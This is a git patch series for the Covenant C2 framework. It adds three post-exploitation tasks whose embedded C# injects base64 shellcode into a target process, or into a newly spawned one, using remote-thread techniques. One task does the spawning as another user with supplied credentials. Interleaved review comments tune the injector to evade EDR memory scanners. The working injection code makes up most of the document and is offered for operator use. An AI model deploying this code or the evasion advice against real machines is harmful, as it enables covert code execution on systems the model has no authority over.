From 04cc2ca83e1f71c47e3a5eb4d00655279c5ce3ab Mon Sep 17 00:00:00 2001 From: salu90 Date: Wed, 23 Sep 2020 18:43:46 +0200 Subject: [PATCH 1/3] add processInjection tasks --- .../Data/Tasks/SharpSploit.Execution.yaml | 406 ++++++++++++++++++ 1 file changed, 406 insertions(+) diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index b78ae7c3..8bfeb097 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml 
@@ -1052,4 +1052,410 @@ DotNetVersion: Net35 EmbeddedResources: [] ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjection + Aliases: [] + Author: + Name: '' + Handle: '' + Link: '' + Description: inject test + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n {\n int ProcID = Int32.Parse(ProcessID);\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcessID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Technique + Value: '' + DefaultValue: CreateRemoteThread + Description: Injection technique + SuggestedValues: + - CreateRemoteThread + - NtCreateThreadEx + - RtlCreateUserThread + Optional: true + DisplayInCommand: true + FileOption: false + - Name: ProcessID + Value: '' + DefaultValue: '' + Description: Process ID of the process to impersonate + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ShellCode + Value: '' + DefaultValue: '' + Description: ShellCode to Inject. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. 
+ Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: 
System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjectionSpawn + Aliases: [] + Author: + Name: '' + Handle: '' + Link: '' + Description: aaa + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Technique + Value: '' + DefaultValue: CreateRemoteThread + Description: Injection technique + SuggestedValues: + - CreateRemoteThread + - NtCreateThreadEx + - RtlCreateUserThread + Optional: true + DisplayInCommand: true + FileOption: false + - Name: ProcessName + Value: '' + DefaultValue: '' + Description: Process ID of the process to impersonate + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ShellCode + Value: '' + DefaultValue: '' + Description: ShellCode to Inject. 
+ SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true + - Name: ParentPID + Value: '' + DefaultValue: '' + Description: ppid + SuggestedValues: [] + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: 
net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] + EmbeddedResources: [] +- Name: ProcessInjectionSpawnAs + Aliases: [] + Author: + Name: '' + Handle: '' + Link: '' + Description: aaa + Help: + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string Username, string Password, string Domain, string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.createProcessAsPInvoke(ProcessName, Domain, Username, Password).dwProcessId;\n }\n else\n {\n output += \"not implmented\";\n return output;\n //TODO\n // ADD FUNCTION IN SHARPSPLOIT\n //int PPID = Int32.Parse(ParentPID);\n //ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + TaskingType: Assembly + UnsafeCompile: false + TokenTask: false + Options: + - Name: Technique + Value: '' + DefaultValue: CreateRemoteThread + Description: Injection technique + SuggestedValues: + - CreateRemoteThread + - NtCreateThreadEx + - RtlCreateUserThread + Optional: true + DisplayInCommand: true + FileOption: false + - Name: ProcessName + Value: '' + DefaultValue: '' + Description: Process ID of the process to impersonate + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ShellCode + Value: 
'' + DefaultValue: '' + Description: ShellCode to Inject. + SuggestedValues: [] + Optional: false + DisplayInCommand: false + FileOption: true + - Name: Username + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: Password + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: Domain + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: false + DisplayInCommand: true + FileOption: false + - Name: ParentPID + Value: '' + DefaultValue: '' + Description: '' + SuggestedValues: [] + Optional: true + DisplayInCommand: true + FileOption: false + ReferenceSourceLibraries: + - Name: SharpSploit + Description: SharpSploit is a library for C# post-exploitation modules. + Location: SharpSploit\SharpSploit\ + Language: CSharp + CompatibleDotNetVersions: + - Net35 + - Net40 + ReferenceAssemblies: + - Name: System.Core.dll + Location: net40\System.Core.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.dll + Location: net40\System.DirectoryServices.dll + DotNetVersion: Net40 + - Name: System.DirectoryServices.Protocols.dll + Location: net40\System.DirectoryServices.Protocols.dll + DotNetVersion: Net40 + - Name: System.dll + Location: net40\System.dll + DotNetVersion: Net40 + - Name: System.IdentityModel.dll + Location: net40\System.IdentityModel.dll + DotNetVersion: Net40 + - Name: System.Management.Automation.dll + Location: net40\System.Management.Automation.dll + DotNetVersion: Net40 + - Name: System.Management.dll + Location: net40\System.Management.dll + DotNetVersion: Net40 + - Name: System.ServiceProcess.dll + Location: net40\System.ServiceProcess.dll + DotNetVersion: Net40 + - Name: mscorlib.dll + Location: net40\mscorlib.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net35\System.XML.dll + DotNetVersion: Net35 + - Name: 
System.Windows.Forms.dll + Location: net35\System.Windows.Forms.dll + DotNetVersion: Net35 + - Name: System.dll + Location: net35\System.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.Protocols.dll + Location: net35\System.DirectoryServices.Protocols.dll + DotNetVersion: Net35 + - Name: System.DirectoryServices.dll + Location: net35\System.DirectoryServices.dll + DotNetVersion: Net35 + - Name: System.Core.dll + Location: net35\System.Core.dll + DotNetVersion: Net35 + - Name: mscorlib.dll + Location: net35\mscorlib.dll + DotNetVersion: Net35 + - Name: System.IdentityModel.dll + Location: net35\System.IdentityModel.dll + DotNetVersion: Net35 + - Name: System.Management.Automation.dll + Location: net35\System.Management.Automation.dll + DotNetVersion: Net35 + - Name: System.Management.dll + Location: net35\System.Management.dll + DotNetVersion: Net35 + - Name: System.ServiceProcess.dll + Location: net35\System.ServiceProcess.dll + DotNetVersion: Net35 + - Name: System.Windows.Forms.dll + Location: net40\System.Windows.Forms.dll + DotNetVersion: Net40 + - Name: System.XML.dll + Location: net40\System.XML.dll + DotNetVersion: Net40 + EmbeddedResources: [] + ReferenceAssemblies: [] EmbeddedResources: [] \ No newline at end of file From 352f5af157a90cf1960d79f1f14b367780e626e9 Mon Sep 17 00:00:00 2001 From: salu90 Date: Thu, 24 Sep 2020 18:36:34 +0200 Subject: [PATCH 2/3] minor fixes in injection tasks --- .../Data/Tasks/SharpSploit.Execution.yaml | 186 ++---------------- 1 file changed, 16 insertions(+), 170 deletions(-) diff --git a/Covenant/Data/Tasks/SharpSploit.Execution.yaml b/Covenant/Data/Tasks/SharpSploit.Execution.yaml index 8bfeb097..2c5beaca 100644 --- a/Covenant/Data/Tasks/SharpSploit.Execution.yaml +++ b/Covenant/Data/Tasks/SharpSploit.Execution.yaml 
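Review bot: All three new tasks map the remote view of the shellcode section with `remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE` in the `SectionMapAlloc` initializer, which leaves a writable-and-executable region in the target process — one of the most common artifacts memory scanners and EDR products look for. The payload is copied in through the local `PAGE_READWRITE` view, so the remote side only needs to execute it; `remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READ` should suffice unless a payload modifies itself in place, and either choice deserves a comment in the `Code:` string. The `Password` option of ProcessInjectionSpawnAs is also declared with `DisplayInCommand: true`, so the cleartext credential would be echoed into the Grunt command history; if that task is kept it should be `DisplayInCommand: false`.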
@@ -1056,24 +1056,24 @@ - Name: ProcessInjection Aliases: [] Author: - Name: '' - Handle: '' + Name: 'Simone Salucci & Daniel López' + Handle: '@saim1z @attl4s' Link: '' - Description: inject test + Description: Injects and executes the specified shellcode into the process specified by the ProcessID parameter using one of the available techniques Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n {\n int ProcID = Int32.Parse(ProcessID);\n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcessID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + Code: "using System;\nusing System.Diagnostics;\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessID, string ShellCode)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. 
CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n int currentProcessID = Process.GetCurrentProcess().Id;\n if (ProcessID == \"\" || ProcessID == \"\\\"\")\n {\n ProcID = currentProcessID;\n output += \"PID not specified, shellcode will be injected into the current process\\n\";\n }\n else\n {\n ProcID = Int32.Parse(ProcessID);\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName + \" with PID \" + ProcID;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}" TaskingType: Assembly UnsafeCompile: false TokenTask: false Options: - - Name: Technique + - Name: ExecutionTechnique Value: '' DefaultValue: CreateRemoteThread - Description: Injection technique + Description: The technique used to execute the specified shellcode. SuggestedValues: - CreateRemoteThread - NtCreateThreadEx 
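Review bot: In the rewritten `Code:` string the line `IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);` still precedes `Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);`, and `payloadLocation` is never read. Since `Injector.Inject` receives the same `allocationTechnique`, it presumably performs its own allocation, so the shellcode appears to be mapped into the target twice and the first RWX copy is left orphaned in the process — drop the explicit `Allocate` line (or use its return value and skip the injector) so exactly one copy exists. The `return output;` after the `catch` is unreachable and will produce a CS0162 warning at task compile time. Defaulting an empty ProcessID to `Process.GetCurrentProcess().Id` also means a forgotten argument runs arbitrary shellcode inside the Grunt itself, where a crash or an `ExitProcess` in the payload kills the implant; consider requiring an explicit sentinel such as `self` rather than treating an empty value as self-injection.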
@@ -1084,9 +1084,9 @@ - Name: ProcessID Value: '' DefaultValue: '' - Description: Process ID of the process to impersonate + Description: Process ID of the process to impersonate. If empty, the shellcode will be injected into the current process. SuggestedValues: [] - Optional: false + Optional: true DisplayInCommand: true FileOption: false - Name: ShellCode 
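Review bot: The new `Description` for ProcessID still calls the target "the process to impersonate", which is misleading — the task injects into that process and nothing is impersonated (impersonation tasks are flagged separately via `TokenTask`). Suggest `Description: PID of the target process to inject into. If empty, the shellcode is injected into the current (Grunt) process.` so the operator-facing help matches what the code does.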
@@ -1178,24 +1178,24 @@ - Name: ProcessInjectionSpawn Aliases: [] Author: - Name: '' - Handle: '' + Name: 'Simone Salucci & Daniel López' + Handle: '@saim1z @attl4s' Link: '' - Description: aaa + Description: Creates a new process using the createProcess Win32 API call through PInvoke and injects and executes the specified shellcode using one of the available techniques Help: Language: CSharp CompatibleDotNetVersions: - Net35 - Net40 - Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string Technique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (Technique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (Technique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (Technique == \"RtlCreateUserThread\") {apiTechnique = RemoteThreadCreate.APIS.RtlCreateUserThread;}\n //TODO review how to detect empty string \n else if (Technique == \"\" || Technique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + Technique + \" is not implemented. 
Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" + Code: "using System;\nusing System.Diagnostics;\n\nusing SharpSploit.Execution;\nusing SharpSploit.Execution.Injection;\n\npublic static class Task\n{\n public static string Execute(string ExecutionTechnique, string ProcessName, string ShellCode,string ParentPID)\n {\n string output = \"\";\n RemoteThreadCreate.APIS apiTechnique;\n\n if (ExecutionTechnique == \"CreateRemoteThread\") {apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;}\n else if (ExecutionTechnique == \"NtCreateThreadEx\") {apiTechnique = RemoteThreadCreate.APIS.NtCreateThreadEx;}\n else if (ExecutionTechnique == \"RtlCreateUserThread\") {apiTechnique = 
RemoteThreadCreate.APIS.RtlCreateUserThread;} \n else if (ExecutionTechnique == \"\" || ExecutionTechnique == \"\\\"\")\n {\n apiTechnique = RemoteThreadCreate.APIS.CreateRemoteThread;\n output += \"No technique passed as argument. CreateRemoteThread technique was used\\n\";\n }\n else\n {\n output += \"Injection technique \" + ExecutionTechnique + \" is not implemented. Choose one of the following values:\\n\" +\n \"CreateRemoteThread\\n\" +\n \"NtCreateThreadEx\\n\" +\n \"RtlCreateUserThread\\n\";\n return output;\n }\n \n try\n { \n int ProcID;\n if (ParentPID == \"\" || ParentPID == \"\\\"\")\n {\n ProcID = (int)Shell.CreateProcessPInvoke(ProcessName).dwProcessId;\n }\n else\n {\n int PPID = Int32.Parse(ParentPID);\n ProcID = (int)Shell.CreateProcessPInvokePPID(ProcessName,PPID).dwProcessId;\n }\n \n Process proc = Process.GetProcessById(ProcID);\n RemoteThreadCreate injectionTechnique = new RemoteThreadCreate\n {\n api = apiTechnique,\n suspended = false\n };\n SectionMapAlloc allocationTechnique = new SectionMapAlloc\n {\n localSectionPermissions = Win32.WinNT.PAGE_READWRITE,\n remoteSectionPermissions = Win32.WinNT.PAGE_EXECUTE_READWRITE,\n sectionAttributes = Win32.WinNT.SEC_COMMIT\n };\n\n PICPayload payload = new PICPayload(Convert.FromBase64String(ShellCode));\n IntPtr payloadLocation = allocationTechnique.Allocate(payload, proc);\n Injector.Inject(payload, allocationTechnique, injectionTechnique, proc);\n \n output += \"Attempting to inject the provided shellcode into process \" + proc.ProcessName;\n return output;\n }\n catch (Exception e) { return e.GetType().FullName + \": \" + e.Message + Environment.NewLine + e.StackTrace; }\n return output;\n }\n}\n\n" TaskingType: Assembly UnsafeCompile: false TokenTask: false Options: - - Name: Technique + - Name: ExecutionTechnique Value: '' DefaultValue: CreateRemoteThread - Description: Injection technique + Description: Injection technique. SuggestedValues: - CreateRemoteThread - NtCreateThreadEx 
